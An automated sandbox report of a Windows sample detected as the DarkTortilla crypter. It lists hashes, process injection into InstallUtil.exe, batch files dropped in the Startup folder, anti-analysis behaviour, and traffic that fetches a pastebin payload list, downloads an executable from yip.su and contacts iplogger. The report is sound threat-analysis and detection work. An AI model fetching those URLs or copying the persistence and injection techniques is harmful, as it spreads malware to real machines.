Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1508816
MD5:6d42583de8cb7222d51b9e5976ab2ed2
SHA1:800f8bbcc6730f06f9bb9f2431b48ac7c0385fce
SHA256:13de95a8a6ab504e0060485cc8eaab56531aa1b1a9e567d722774e15ea126640
Tags:NETexeMSIL
Infos:

Detection

DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Creates HTML files with .exe extension (expired dropper behavior)
Drops script or batch files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6D42583DE8CB7222D51B9E5976AB2ED2)
    • InstallUtil.exe (PID: 7848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cmd.exe (PID: 6632 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkpj4eLKYuRL6LrNltOgK200.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VKr8Efnr4PhdaHsuTmp4wB4v.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2844 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JG3bSh7wTLa4W4VZ8WnUKE9x.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWq659NA2OqtOCxKRUrX3Wvt.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UMHO1eaoah7nvsSNcEMZSaPH.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ybsrj9OwOR4A6LpqK3nX4c7P.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B7apkUpVBoYMsvQw8GBJaP4b.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1761380905.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000000.00000002.1773580345.0000000003FE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000000.00000002.1774284685.0000000005660000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
        Process Memory Space: file.exe PID: 7640JoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          Process Memory Space: file.exe PID: 7640JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.2.file.exe.3082a78.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.2.file.exe.3fe5570.2.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  0.2.file.exe.5660000.3.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    0.2.file.exe.5660000.3.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 7848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.bat

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: https://pastebin.com/raw/V6VJsrV3Avira URL Cloud: Label: malware
                      Source: https://yip.su/RNWPd.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: file.exeReversingLabs: Detection: 42%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.11:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.11:49715 version: TLS 1.2
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior

                      Networking

                      barindex
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Creates HTML files with .exe extension (expired dropper behavior)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: whUHN2pww65ZtjYEzLyUMEnE.exe.3.dr
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3082a78.0.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: iplogger.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: yip.su
                      Source: global trafficDNS traffic detected: DNS query: iplogger.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 10 Sep 2024 16:21:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                      Source: InstallUtil.exe, 00000003.00000002.2629038270.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.000000000300C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yip.su
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003023000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000305B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://counter.yadro.ru/hit?
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1djqU4
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003023000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000305B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://iplogger.org/
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003023000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000305B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://iplogger.org/privacy/
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003023000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000305B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://iplogger.org/rules/
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV3
                      Source: file.exe, 00000000.00000002.1761380905.0000000003078000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2627970617.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000002F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.compa
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000002FEE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003072000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003086000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003096000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.00000000030DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
